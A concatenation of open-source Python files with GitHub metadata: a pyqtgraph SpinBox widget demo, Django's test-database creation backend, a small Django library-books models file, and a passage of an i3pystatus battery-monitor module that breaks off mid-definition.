"alnum_prop": 0.6088270858524788,
"repo_name": "trickTech/BRB",
"id": "4c0ff271d5f5b4cb42a5bad4ed0ce9a7f41cede6",
"size": "1716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "user/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "28404"
},
{
"name": "Shell",
"bytes": "61"
}
],
"symlink_target": ""
} |
"""
This example demonstrates the SpinBox widget, which is an extension of
QDoubleSpinBox providing some advanced features:
* SI-prefixed units
* Non-linear stepping modes
* Bounded/unbounded values
"""
import initExample ## Add path to library (just for examples; you do not need this)
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import ast
app = QtGui.QApplication([])

# Each entry pairs an HTML description label with a configured SpinBox
# demonstrating one feature combination.
spins = [
    ("Floating-point spin box, min=0, no maximum.",
     pg.SpinBox(value=5.0, bounds=[0, None])),
    ("Integer spin box, dec stepping<br>(1-9, 10-90, 100-900, etc), decimals=4",
     pg.SpinBox(value=10, int=True, dec=True, minStep=1, step=1, decimals=4)),
    ("Float with SI-prefixed units<br>(n, u, m, k, M, etc)",
     pg.SpinBox(value=0.9, suffix='V', siPrefix=True)),
    ("Float with SI-prefixed units,<br>dec step=0.1, minStep=0.1",
     pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=0.1, minStep=0.1)),
    ("Float with SI-prefixed units,<br>dec step=0.5, minStep=0.01",
     pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=0.5, minStep=0.01)),
    ("Float with SI-prefixed units,<br>dec step=1.0, minStep=0.001",
     pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=1.0, minStep=0.001)),
    ("Float with custom formatting",
     pg.SpinBox(value=23.07, format='${value:0.02f}',
                regex='\$?(?P<number>(-?\d+(\.\d+)?)|(-?\.\d+))$')),
    ("Int with custom formatting",
     pg.SpinBox(value=4567, step=1, int=True, bounds=[0,None], format='0x{value:X}',
                regex='(0x)?(?P<number>[0-9a-fA-F]+)$',
                evalFunc=lambda s: ast.literal_eval('0x'+s))),
    # NOTE(review): the label says "Integer" but int=False here -- confirm
    # which was intended.
    ("Integer with bounds=[10, 20] and wrapping",
     pg.SpinBox(value=10, bounds=[10, 20], int=False, minStep=1, step=1, wrapping=True)),
]

# Main window with a two-column grid: spin boxes on the left, live value
# readouts on the right.
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example: SpinBox')
cw = QtGui.QWidget()
layout = QtGui.QGridLayout()
cw.setLayout(layout)
win.setCentralWidget(cw)
win.show()
#win.resize(300, 600)

changingLabel = QtGui.QLabel()  ## updated immediately
changedLabel = QtGui.QLabel()   ## updated only when editing is finished or mouse wheel has stopped for 0.3sec
changingLabel.setMinimumWidth(200)
# Emphasize both readout labels with the same bold 14pt font.
font = changingLabel.font()
font.setBold(True)
font.setPointSize(14)
changingLabel.setFont(font)
changedLabel.setFont(font)
labels = []
def valueChanged(sb):
    """Slot for sigValueChanged: display the settled value of *sb*."""
    final = str(sb.value())
    changedLabel.setText("Final value: %s" % final)
def valueChanging(sb, value):
    """Slot for sigValueChanging: display the in-progress value of *sb*."""
    current = str(sb.value())
    changingLabel.setText("Value changing: %s" % current)
# Build one grid row per (description, spinbox) pair and hook both value
# signals up to the readout labels.
for text, spin in spins:
    label = QtGui.QLabel(text)
    labels.append(label)
    layout.addWidget(label)
    layout.addWidget(spin)
    spin.sigValueChanged.connect(valueChanged)
    spin.sigValueChanging.connect(valueChanging)

# Readout labels go in the second grid column.
layout.addWidget(changingLabel, 0, 1)
layout.addWidget(changedLabel, 2, 1)
#def mkWin():
#win = QtGui.QMainWindow()
#g = QtGui.QFormLayout()
#w = QtGui.QWidget()
#w.setLayout(g)
#win.setCentralWidget(w)
#s1 = SpinBox(value=5, step=0.1, bounds=[-1.5, None], suffix='units')
#t1 = QtGui.QLineEdit()
#g.addRow(s1, t1)
#s2 = SpinBox(value=10e-6, dec=True, step=0.1, minStep=1e-6, suffix='A', siPrefix=True)
#t2 = QtGui.QLineEdit()
#g.addRow(s2, t2)
#s3 = SpinBox(value=1000, dec=True, step=0.5, minStep=1e-6, bounds=[1, 1e9], suffix='Hz', siPrefix=True)
#t3 = QtGui.QLineEdit()
#g.addRow(s3, t3)
#s4 = SpinBox(int=True, dec=True, step=1, minStep=1, bounds=[-10, 1000])
#t4 = QtGui.QLineEdit()
#g.addRow(s4, t4)
#win.show()
#import sys
#for sb in [s1, s2, s3,s4]:
##QtCore.QObject.connect(sb, QtCore.SIGNAL('valueChanged(double)'), lambda v: sys.stdout.write(str(sb) + " valueChanged\n"))
##QtCore.QObject.connect(sb, QtCore.SIGNAL('editingFinished()'), lambda: sys.stdout.write(str(sb) + " editingFinished\n"))
#sb.sigValueChanged.connect(valueChanged)
#sb.sigValueChanging.connect(valueChanging)
#sb.editingFinished.connect(lambda: sys.stdout.write(str(sb) + " editingFinished\n"))
#return win, w, [s1, s2, s3, s4]
#a = mkWin()
#def test(n=100):
#for i in range(n):
#win, w, sb = mkWin()
#for s in sb:
#w.setParent(None)
#s.setParent(None)
#s.valueChanged.disconnect()
#s.editingFinished.disconnect()
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
    import sys
    # Under PySide, or when Python was started non-interactively, the event
    # loop must be run explicitly.
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        QtGui.QApplication.instance().exec_()
| {
"content_hash": "55ea1ceeeb69bde735e96c945f987b89",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 132,
"avg_line_length": 35.646153846153844,
"alnum_prop": 0.6486836426413466,
"repo_name": "pmaunz/pyqtgraph",
"id": "2faf10eec8ef04c09beacec602ace44c2027acc5",
"size": "4658",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "examples/SpinBox.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "1752"
},
{
"name": "Python",
"bytes": "2125387"
}
],
"symlink_target": ""
} |
import hashlib
import sys
import time
from django.conf import settings
from django.db.utils import load_backend
from django.utils.encoding import force_bytes
from django.utils.functional import cached_property
from django.utils.six.moves import input
from .utils import truncate_name
# The prefix to put on the default database name when creating
# the test database.
TEST_DATABASE_PREFIX = 'test_'
# Connection alias for the "no database selected" connection used to
# create/drop the test database (see BaseDatabaseCreation._nodb_connection).
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseCreation(object):
    """
    This class encapsulates all backend-specific differences that pertain to
    database *creation*, such as the column types to use for particular Django
    Fields, the SQL used to create and destroy tables, and the creation and
    destruction of test databases.
    """
    # Field-type -> column-type mappings; empty here, left for backend
    # subclasses to fill in.
    data_types = {}
    data_types_suffix = {}
    data_type_check_constraints = {}

    def __init__(self, connection):
        # The DatabaseWrapper whose settings and ops this helper uses.
        self.connection = connection

    @cached_property
    def _nodb_connection(self):
        """
        Alternative connection to be used when there is no need to access
        the main database, specifically for test db creation/deletion.
        This also prevents the production database from being exposed to
        potential child threads while (or after) the test database is destroyed.
        Refs #10868, #17786, #16969.
        """
        settings_dict = self.connection.settings_dict.copy()
        settings_dict['NAME'] = None
        backend = load_backend(settings_dict['ENGINE'])
        nodb_connection = backend.DatabaseWrapper(
            settings_dict,
            alias=NO_DB_ALIAS,
            allow_thread_sharing=False)
        return nodb_connection

    @classmethod
    def _digest(cls, *args):
        """
        Generates a 32-bit digest of a set of arguments that can be used to
        shorten identifying names.
        """
        # md5 is used only to shorten names deterministically, not for
        # security.
        h = hashlib.md5()
        for arg in args:
            h.update(force_bytes(arg))
        return h.hexdigest()[:8]

    def sql_create_model(self, model, style, known_models=set()):
        """
        Returns the SQL required to create a single model, as a tuple of:
            (list_of_sql, pending_references_dict)
        """
        # NOTE(review): the mutable default ``known_models=set()`` is shared
        # across calls; safe here because it is only read, never mutated.
        opts = model._meta
        if not opts.managed or opts.proxy or opts.swapped:
            return [], {}
        final_output = []
        table_output = []
        pending_references = {}
        qn = self.connection.ops.quote_name
        for f in opts.local_fields:
            col_type = f.db_type(connection=self.connection)
            col_type_suffix = f.db_type_suffix(connection=self.connection)
            tablespace = f.db_tablespace or opts.db_tablespace
            if col_type is None:
                # Skip ManyToManyFields, because they're not represented as
                # database columns in this table.
                continue
            # Make the definition (e.g. 'foo VARCHAR(30)') for this field.
            field_output = [style.SQL_FIELD(qn(f.column)),
                            style.SQL_COLTYPE(col_type)]
            # Oracle treats the empty string ('') as null, so coerce the null
            # option whenever '' is a possible value.
            null = f.null
            if (f.empty_strings_allowed and not f.primary_key and
                    self.connection.features.interprets_empty_strings_as_nulls):
                null = True
            if not null:
                field_output.append(style.SQL_KEYWORD('NOT NULL'))
            if f.primary_key:
                field_output.append(style.SQL_KEYWORD('PRIMARY KEY'))
            elif f.unique:
                field_output.append(style.SQL_KEYWORD('UNIQUE'))
            if tablespace and f.unique:
                # We must specify the index tablespace inline, because we
                # won't be generating a CREATE INDEX statement for this field.
                tablespace_sql = self.connection.ops.tablespace_sql(
                    tablespace, inline=True)
                if tablespace_sql:
                    field_output.append(tablespace_sql)
            if f.rel and f.db_constraint:
                # Foreign keys to not-yet-created tables are deferred into
                # pending_references and emitted later as ALTER TABLE.
                ref_output, pending = self.sql_for_inline_foreign_key_references(
                    model, f, known_models, style)
                if pending:
                    pending_references.setdefault(f.rel.to, []).append(
                        (model, f))
                else:
                    field_output.extend(ref_output)
            if col_type_suffix:
                field_output.append(style.SQL_KEYWORD(col_type_suffix))
            table_output.append(' '.join(field_output))
        # Table-level UNIQUE constraints from Meta.unique_together.
        for field_constraints in opts.unique_together:
            table_output.append(style.SQL_KEYWORD('UNIQUE') + ' (%s)' %
                ", ".join(
                    [style.SQL_FIELD(qn(opts.get_field(f).column))
                     for f in field_constraints]))
        full_statement = [style.SQL_KEYWORD('CREATE TABLE') + ' ' +
                          style.SQL_TABLE(qn(opts.db_table)) + ' (']
        for i, line in enumerate(table_output):  # Combine and add commas.
            full_statement.append(
                '    %s%s' % (line, ',' if i < len(table_output) - 1 else ''))
        full_statement.append(')')
        if opts.db_tablespace:
            tablespace_sql = self.connection.ops.tablespace_sql(
                opts.db_tablespace)
            if tablespace_sql:
                full_statement.append(tablespace_sql)
        full_statement.append(';')
        final_output.append('\n'.join(full_statement))
        if opts.has_auto_field:
            # Add any extra SQL needed to support auto-incrementing primary
            # keys.
            auto_column = opts.auto_field.db_column or opts.auto_field.name
            autoinc_sql = self.connection.ops.autoinc_sql(opts.db_table,
                                                          auto_column)
            if autoinc_sql:
                for stmt in autoinc_sql:
                    final_output.append(stmt)
        return final_output, pending_references

    def sql_for_inline_foreign_key_references(self, model, field, known_models, style):
        """
        Return the SQL snippet defining the foreign key reference for a field.
        """
        qn = self.connection.ops.quote_name
        rel_to = field.rel.to
        if rel_to in known_models or rel_to == model:
            output = [style.SQL_KEYWORD('REFERENCES') + ' ' +
                      style.SQL_TABLE(qn(rel_to._meta.db_table)) + ' (' +
                      style.SQL_FIELD(qn(rel_to._meta.get_field(
                          field.rel.field_name).column)) + ')' +
                      self.connection.ops.deferrable_sql()
                      ]
            pending = False
        else:
            # We haven't yet created the table to which this field
            # is related, so save it for later.
            output = []
            pending = True
        return output, pending

    def sql_for_pending_references(self, model, style, pending_references):
        """
        Returns any ALTER TABLE statements to add constraints after the fact.
        """
        opts = model._meta
        if not opts.managed or opts.swapped:
            return []
        qn = self.connection.ops.quote_name
        final_output = []
        if model in pending_references:
            for rel_class, f in pending_references[model]:
                rel_opts = rel_class._meta
                r_table = rel_opts.db_table
                r_col = f.column
                table = opts.db_table
                col = opts.get_field(f.rel.field_name).column
                # For MySQL, r_name must be unique in the first 64 characters.
                # So we are careful with character usage here.
                r_name = '%s_refs_%s_%s' % (
                    r_col, col, self._digest(r_table, table))
                final_output.append(style.SQL_KEYWORD('ALTER TABLE') +
                    ' %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (%s)%s;' %
                    (qn(r_table), qn(truncate_name(
                        r_name, self.connection.ops.max_name_length())),
                    qn(r_col), qn(table), qn(col),
                    self.connection.ops.deferrable_sql()))
            del pending_references[model]
        return final_output

    def sql_indexes_for_model(self, model, style):
        """
        Returns the CREATE INDEX SQL statements for a single model.
        """
        if not model._meta.managed or model._meta.proxy or model._meta.swapped:
            return []
        output = []
        # Single-column indexes, then composite indexes from index_together.
        for f in model._meta.local_fields:
            output.extend(self.sql_indexes_for_field(model, f, style))
        for fs in model._meta.index_together:
            fields = [model._meta.get_field_by_name(f)[0] for f in fs]
            output.extend(self.sql_indexes_for_fields(model, fields, style))
        return output

    def sql_indexes_for_field(self, model, f, style):
        """
        Return the CREATE INDEX SQL statements for a single model field.
        """
        # unique fields already get an index via their UNIQUE constraint.
        if f.db_index and not f.unique:
            return self.sql_indexes_for_fields(model, [f], style)
        else:
            return []

    def sql_indexes_for_fields(self, model, fields, style):
        # A single field may carry its own tablespace; otherwise fall back to
        # the model's tablespace.
        if len(fields) == 1 and fields[0].db_tablespace:
            tablespace_sql = self.connection.ops.tablespace_sql(fields[0].db_tablespace)
        elif model._meta.db_tablespace:
            tablespace_sql = self.connection.ops.tablespace_sql(model._meta.db_tablespace)
        else:
            tablespace_sql = ""
        if tablespace_sql:
            tablespace_sql = " " + tablespace_sql
        field_names = []
        qn = self.connection.ops.quote_name
        for f in fields:
            field_names.append(style.SQL_FIELD(qn(f.column)))
        # Digest of the field names keeps the index name short and unique.
        index_name = "%s_%s" % (model._meta.db_table, self._digest([f.name for f in fields]))
        return [
            style.SQL_KEYWORD("CREATE INDEX") + " " +
            style.SQL_TABLE(qn(truncate_name(index_name, self.connection.ops.max_name_length()))) + " " +
            style.SQL_KEYWORD("ON") + " " +
            style.SQL_TABLE(qn(model._meta.db_table)) + " " +
            "(%s)" % style.SQL_FIELD(", ".join(field_names)) +
            "%s;" % tablespace_sql,
        ]

    def sql_destroy_model(self, model, references_to_delete, style):
        """
        Return the DROP TABLE and restraint dropping statements for a single
        model.
        """
        if not model._meta.managed or model._meta.proxy or model._meta.swapped:
            return []
        # Drop the table now
        qn = self.connection.ops.quote_name
        output = ['%s %s;' % (style.SQL_KEYWORD('DROP TABLE'),
                              style.SQL_TABLE(qn(model._meta.db_table)))]
        if model in references_to_delete:
            output.extend(self.sql_remove_table_constraints(
                model, references_to_delete, style))
        if model._meta.has_auto_field:
            # Also drop any sequence backing the auto-increment column.
            ds = self.connection.ops.drop_sequence_sql(model._meta.db_table)
            if ds:
                output.append(ds)
        return output

    def sql_remove_table_constraints(self, model, references_to_delete, style):
        if not model._meta.managed or model._meta.proxy or model._meta.swapped:
            return []
        output = []
        qn = self.connection.ops.quote_name
        for rel_class, f in references_to_delete[model]:
            table = rel_class._meta.db_table
            col = f.column
            r_table = model._meta.db_table
            r_col = model._meta.get_field(f.rel.field_name).column
            # Must mirror the r_name built in sql_for_pending_references so
            # the same constraint name is dropped.
            r_name = '%s_refs_%s_%s' % (
                col, r_col, self._digest(table, r_table))
            output.append('%s %s %s %s;' % (
                style.SQL_KEYWORD('ALTER TABLE'),
                style.SQL_TABLE(qn(table)),
                style.SQL_KEYWORD(self.connection.ops.drop_foreignkey_sql()),
                style.SQL_FIELD(qn(truncate_name(
                    r_name, self.connection.ops.max_name_length())))
            ))
        del references_to_delete[model]
        return output

    def sql_destroy_indexes_for_model(self, model, style):
        """
        Returns the DROP INDEX SQL statements for a single model.
        """
        if not model._meta.managed or model._meta.proxy or model._meta.swapped:
            return []
        output = []
        for f in model._meta.local_fields:
            output.extend(self.sql_destroy_indexes_for_field(model, f, style))
        for fs in model._meta.index_together:
            fields = [model._meta.get_field_by_name(f)[0] for f in fs]
            output.extend(self.sql_destroy_indexes_for_fields(model, fields, style))
        return output

    def sql_destroy_indexes_for_field(self, model, f, style):
        """
        Return the DROP INDEX SQL statements for a single model field.
        """
        if f.db_index and not f.unique:
            return self.sql_destroy_indexes_for_fields(model, [f], style)
        else:
            return []

    def sql_destroy_indexes_for_fields(self, model, fields, style):
        # Tablespace resolution mirrors sql_indexes_for_fields.
        if len(fields) == 1 and fields[0].db_tablespace:
            tablespace_sql = self.connection.ops.tablespace_sql(fields[0].db_tablespace)
        elif model._meta.db_tablespace:
            tablespace_sql = self.connection.ops.tablespace_sql(model._meta.db_tablespace)
        else:
            tablespace_sql = ""
        if tablespace_sql:
            tablespace_sql = " " + tablespace_sql
        field_names = []
        qn = self.connection.ops.quote_name
        for f in fields:
            field_names.append(style.SQL_FIELD(qn(f.column)))
        # Rebuild the same digested name the CREATE INDEX used.
        index_name = "%s_%s" % (model._meta.db_table, self._digest([f.name for f in fields]))
        return [
            style.SQL_KEYWORD("DROP INDEX") + " " +
            style.SQL_TABLE(qn(truncate_name(index_name, self.connection.ops.max_name_length()))) + " " +
            ";",
        ]

    def create_test_db(self, verbosity=1, autoclobber=False):
        """
        Creates a test database, prompting the user for confirmation if the
        database already exists. Returns the name of the test database created.
        """
        # Don't import django.core.management if it isn't needed.
        from django.core.management import call_command
        test_database_name = self._get_test_db_name()
        if verbosity >= 1:
            test_db_repr = ''
            if verbosity >= 2:
                test_db_repr = " ('%s')" % test_database_name
            print("Creating test database for alias '%s'%s..." % (
                self.connection.alias, test_db_repr))
        self._create_test_db(verbosity, autoclobber)
        self.connection.close()
        # Point both the global settings and this connection at the test db.
        settings.DATABASES[self.connection.alias]["NAME"] = test_database_name
        self.connection.settings_dict["NAME"] = test_database_name
        # Report migrate messages at one level lower than that requested.
        # This ensures we don't get flooded with messages during testing
        # (unless you really ask to be flooded)
        call_command('migrate',
            verbosity=max(verbosity - 1, 0),
            interactive=False,
            database=self.connection.alias,
            load_initial_data=False,
            test_database=True)
        # We need to then do a flush to ensure that any data installed by
        # custom SQL has been removed. The only test data should come from
        # test fixtures, or autogenerated from post_migrate triggers.
        # This has the side effect of loading initial data (which was
        # intentionally skipped in the syncdb).
        call_command('flush',
            verbosity=max(verbosity - 1, 0),
            interactive=False,
            database=self.connection.alias)
        call_command('createcachetable', database=self.connection.alias)
        # Ensure a connection for the side effect of initializing the test database.
        self.connection.ensure_connection()
        return test_database_name

    def _get_test_db_name(self):
        """
        Internal implementation - returns the name of the test DB that will be
        created. Only useful when called from create_test_db() and
        _create_test_db() and when no external munging is done with the 'NAME'
        or 'TEST_NAME' settings.
        """
        if self.connection.settings_dict['TEST']['NAME']:
            return self.connection.settings_dict['TEST']['NAME']
        return TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']

    def _create_test_db(self, verbosity, autoclobber):
        """
        Internal implementation - creates the test db tables.
        """
        suffix = self.sql_table_creation_suffix()
        test_database_name = self._get_test_db_name()
        qn = self.connection.ops.quote_name
        # Create the test database and connect to it.
        with self._nodb_connection.cursor() as cursor:
            try:
                cursor.execute(
                    "CREATE DATABASE %s %s" % (qn(test_database_name), suffix))
            except Exception as e:
                # Creation failed, most likely because the db already exists;
                # offer to drop and recreate it (or do so silently when
                # autoclobber is set).
                sys.stderr.write(
                    "Got an error creating the test database: %s\n" % e)
                if not autoclobber:
                    confirm = input(
                        "Type 'yes' if you would like to try deleting the test "
                        "database '%s', or 'no' to cancel: " % test_database_name)
                if autoclobber or confirm == 'yes':
                    try:
                        if verbosity >= 1:
                            print("Destroying old test database '%s'..."
                                  % self.connection.alias)
                        cursor.execute(
                            "DROP DATABASE %s" % qn(test_database_name))
                        cursor.execute(
                            "CREATE DATABASE %s %s" % (qn(test_database_name),
                                                       suffix))
                    except Exception as e:
                        sys.stderr.write(
                            "Got an error recreating the test database: %s\n" % e)
                        sys.exit(2)
                else:
                    print("Tests cancelled.")
                    sys.exit(1)
        return test_database_name

    def destroy_test_db(self, old_database_name, verbosity=1):
        """
        Destroy a test database, prompting the user for confirmation if the
        database already exists.
        """
        self.connection.close()
        test_database_name = self.connection.settings_dict['NAME']
        if verbosity >= 1:
            test_db_repr = ''
            if verbosity >= 2:
                test_db_repr = " ('%s')" % test_database_name
            print("Destroying test database for alias '%s'%s..." % (
                self.connection.alias, test_db_repr))
        self._destroy_test_db(test_database_name, verbosity)

    def _destroy_test_db(self, test_database_name, verbosity):
        """
        Internal implementation - remove the test db tables.
        """
        # Remove the test database to clean up after
        # ourselves. Connect to the previous database (not the test database)
        # to do so, because it's not allowed to delete a database while being
        # connected to it.
        with self._nodb_connection.cursor() as cursor:
            # Wait to avoid "database is being accessed by other users" errors.
            time.sleep(1)
            cursor.execute("DROP DATABASE %s"
                           % self.connection.ops.quote_name(test_database_name))

    def sql_table_creation_suffix(self):
        """
        SQL to append to the end of the test table creation statements.
        """
        return ''

    def test_db_signature(self):
        """
        Returns a tuple with elements of self.connection.settings_dict (a
        DATABASES setting value) that uniquely identify a database
        accordingly to the RDBMS particularities.
        """
        settings_dict = self.connection.settings_dict
        return (
            settings_dict['HOST'],
            settings_dict['PORT'],
            settings_dict['ENGINE'],
            settings_dict['NAME']
        )
| {
"content_hash": "84f5a449f6544fc2dd1f8e9e6fdfffab",
"timestamp": "",
"source": "github",
"line_count": 486,
"max_line_length": 105,
"avg_line_length": 41.7201646090535,
"alnum_prop": 0.5645590846320774,
"repo_name": "mbox/django",
"id": "b2b82c13c2c5671abf0773669fe88427e357eb6e",
"size": "20276",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "django/db/backends/creation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52957"
},
{
"name": "JavaScript",
"bytes": "102668"
},
{
"name": "Python",
"bytes": "9362347"
},
{
"name": "Shell",
"bytes": "12137"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Author(models.Model):
    """A book author; Book links to it via a many-to-many relation."""
    name = models.CharField(max_length=50)
    def __unicode__(self):
        # Text representation shown in the admin and templates.
        return self.name
class Tag(models.Model):
    """A free-form tag; Book links to it via a many-to-many relation."""
    tag_name = models.CharField(max_length=30)
    def __unicode__(self):
        # Text representation shown in the admin and templates.
        return self.tag_name
class Book(models.Model):
    """A library book with authors, tags and per-user likes."""
    name_book = models.CharField(max_length=60)
    authors = models.ManyToManyField(Author)
    tags = models.ManyToManyField(Tag)
    description = models.TextField(blank=True)
    ISBN = models.CharField(max_length=20, blank=True)
    publishing_house = models.CharField(max_length=20, blank=True)
    # BUG FIX: an IntegerField with blank=True also needs null=True --
    # numeric columns cannot store '' for "no value", so saving a form with
    # these fields left empty raised an IntegrityError.
    year = models.IntegerField(blank=True, null=True)
    quantity = models.IntegerField(blank=True, null=True)
    # Users who liked this book.
    likes = models.ManyToManyField(User)
    def __unicode__(self):
        # Text representation shown in the admin and templates.
        return self.name_book
class Comment(models.Model):
    """A user's dated comment on a book."""
    book = models.ForeignKey(Book)
    user = models.ForeignKey(User)
    date = models.DateField()
    comment = models.TextField()
    def __unicode__(self):
        # BUG FIX: the model has no ``id_book`` attribute, so the previous
        # ``return self.id_book`` raised AttributeError whenever a Comment
        # was rendered as text. Show the comment body instead.
        return self.comment
| {
"content_hash": "f9b22fc3d8e38cdaf0769a313e7d3c0f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 66,
"avg_line_length": 25.488372093023255,
"alnum_prop": 0.6879562043795621,
"repo_name": "XenonSumback/stroustrup-back",
"id": "90ab0dfe7c3b6f270c27b215013cd8ce41f42534",
"size": "1139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "books/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "25678"
}
],
"symlink_target": ""
} |
import os
import re
import configparser
from i3pystatus import IntervalModule, formatp
from i3pystatus.core.util import lchop, TimeWrapper, make_bar
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.command import run_through_shell
class UEventParser(configparser.ConfigParser):
    """Parse a sysfs power_supply ``uevent`` file (KEY=VALUE lines) into a
    dict, with the ``POWER_SUPPLY_`` prefix stripped from every key."""

    def __init__(self):
        # Route all keys into a synthetic default section so the
        # sectionless uevent format satisfies configparser.
        super().__init__(default_section="id10t")

    def optionxform(self, key):
        # Normalise POWER_SUPPLY_FOO -> FOO.
        return lchop(key, "POWER_SUPPLY_")

    def read_string(self, string):
        # Prepend the synthetic section header that __init__ declared.
        super().read_string("[id10t]\n" + string)

    @staticmethod
    def parse_file(file):
        """Read *file* and return its entries as a plain dict."""
        cfg = UEventParser()
        with open(file, "r") as handle:
            cfg.read_string(handle.read())
        return dict(cfg.items("id10t"))
class Battery:
    """Base class for one battery read from a sysfs uevent file.

    Subclasses (BatteryCharge / BatteryEnergy) interpret charge-based (Ah)
    versus energy-based (Wh) kernel fields.  Note the base
    ``consumption(self, val)`` takes a value argument while subclasses
    override it as ``consumption(self)`` and call ``super().consumption(v)``
    as a clamping helper — ``status()`` relies on the subclass signature.
    """
    @staticmethod
    def create(from_file):
        """Factory: choose the subclass matching the fields in *from_file*."""
        battery_info = UEventParser.parse_file(from_file)
        # POWER_NOW present -> energy (Wh) reporting; otherwise charge (Ah).
        if "POWER_NOW" in battery_info:
            return BatteryEnergy(battery_info)
        else:
            return BatteryCharge(battery_info)
    def __init__(self, battery_info):
        # Parsed uevent key/value pairs; mutated in place by normalize_micro.
        self.battery_info = battery_info
        self.normalize_micro()
    def normalize_micro(self):
        """Convert micro-unit readings (µV, µAh, µW, ...) to base units."""
        for key, micro_value in self.battery_info.items():
            if re.match(r"(VOLTAGE|CHARGE|CURRENT|POWER|ENERGY)_(NOW|FULL|MIN)(_DESIGN)?", key):
                self.battery_info[key] = float(micro_value) / 1000000.0
    def percentage(self, design=False):
        """Charge percentage; relative to design capacity if *design*."""
        return self._percentage("_DESIGN" if design else "") * 100
    def status(self):
        """Return 'Charging'/'Discharging'/'Depleted'/'Full', or the raw
        kernel STATUS string when consumption cannot be read."""
        if self.consumption() is None:
            return self.battery_info["STATUS"]
        # > 0.1 matches the clamp threshold in consumption() below —
        # presumably to ignore measurement noise; TODO confirm.
        elif self.consumption() > 0.1 and self.percentage() < 99.9:
            return "Discharging" if self.battery_info["STATUS"] == "Discharging" else "Charging"
        elif self.consumption() == 0 and self.percentage() == 0.00:
            return "Depleted"
        else:
            return "Full"
    def consumption(self, val):
        # Clamp tiny readings (<= 0.1 W) to zero; subclasses call via super().
        return val if val > 0.1 else 0
class BatteryCharge(Battery):
    """Battery whose uevent reports charge (Ah) rather than energy (Wh)."""

    def __init__(self, bi):
        # Some firmwares report CHARGE_NOW above CHARGE_FULL; fall back to
        # the design capacity so percentages stay <= 100%.
        bi["CHARGE_FULL"] = bi["CHARGE_FULL_DESIGN"] if bi["CHARGE_NOW"] > bi["CHARGE_FULL"] else bi["CHARGE_FULL"]
        super().__init__(bi)

    def consumption(self):
        """Power draw in watts, or None if the kernel exposes no readings."""
        if "VOLTAGE_NOW" in self.battery_info and "CURRENT_NOW" in self.battery_info:
            return super().consumption(self.battery_info["VOLTAGE_NOW"] * self.battery_info["CURRENT_NOW"])  # V * A = W
        else:
            return None

    def _percentage(self, design):
        return self.battery_info["CHARGE_NOW"] / self.battery_info["CHARGE_FULL" + design]

    def wh_remaining(self):
        """Remaining energy estimate in Wh (charge * present voltage)."""
        return self.battery_info['CHARGE_NOW'] * self.battery_info['VOLTAGE_NOW']

    def wh_depleted(self):
        """Energy needed to reach full, in Wh."""
        return (self.battery_info['CHARGE_FULL'] - self.battery_info['CHARGE_NOW']) * self.battery_info['VOLTAGE_NOW']

    def remaining(self):
        """Minutes until empty (discharging) or full (charging); -1 if the
        current reading is missing or zero.

        Bug fix: the original guarded only the discharging branch against a
        missing CURRENT_NOW; the charging branch raised KeyError (or
        ZeroDivisionError for a 0 reading). Both branches now degrade to -1.
        """
        current = self.battery_info.get("CURRENT_NOW")
        if self.status() == "Discharging":
            if "CHARGE_NOW" in self.battery_info and current:
                # Ah / A = h; * 60 -> minutes
                return self.battery_info["CHARGE_NOW"] / current * 60
            return -1
        if not current:
            return -1
        return (self.battery_info["CHARGE_FULL"] - self.battery_info["CHARGE_NOW"]) / current * 60
class BatteryEnergy(Battery):
    """Battery whose uevent reports energy (Wh) and power (W) directly."""

    def consumption(self):
        # POWER_NOW is already in watts after normalize_micro().
        return super().consumption(self.battery_info["POWER_NOW"])

    def _percentage(self, design):
        info = self.battery_info
        return info["ENERGY_NOW"] / info["ENERGY_FULL" + design]

    def wh_remaining(self):
        """Remaining energy in Wh."""
        return self.battery_info['ENERGY_NOW']

    def wh_depleted(self):
        """Energy needed to reach full, in Wh."""
        info = self.battery_info
        return info['ENERGY_FULL'] - info['ENERGY_NOW']

    def remaining(self):
        """Minutes until empty (discharging) or until full (otherwise)."""
        info = self.battery_info
        if self.status() == "Discharging":
            energy_delta = info["ENERGY_NOW"]
        else:
            energy_delta = info["ENERGY_FULL"] - info["ENERGY_NOW"]
        # Wh / W = h; * 60 -> minutes
        return energy_delta / info["POWER_NOW"] * 60
class BatteryChecker(IntervalModule):
    """
    This class uses the /sys/class/power_supply/…/uevent interface to check for the
    battery status
    It provides the "ALL" battery_ident which will summarise all available batteries
    for the moment and aggregate the % as well as the time remaining on the charge.
    .. rubric:: Available formatters
    * `{remaining}` — remaining time for charging or discharging, uses TimeWrapper formatting, default format is `%E%h:%M`
    * `{percentage}` — battery percentage relative to the last full value
    * `{percentage_design}` — absolute battery charge percentage
    * `{consumption (Watts)}` — current power flowing into/out of the battery
    * `{status}`
    * `{no_of_batteries}` — The number of batteries included
    * `{battery_ident}` — the same as the setting
    * `{bar}` —bar displaying the relative percentage graphically
    * `{bar_design}` —bar displaying the absolute percentage graphically
    """
    settings = (
        ("battery_ident", "The name of your battery, usually BAT0 or BAT1"),
        "format",
        # NOTE(review): "not_present_text" is listed twice in this tuple
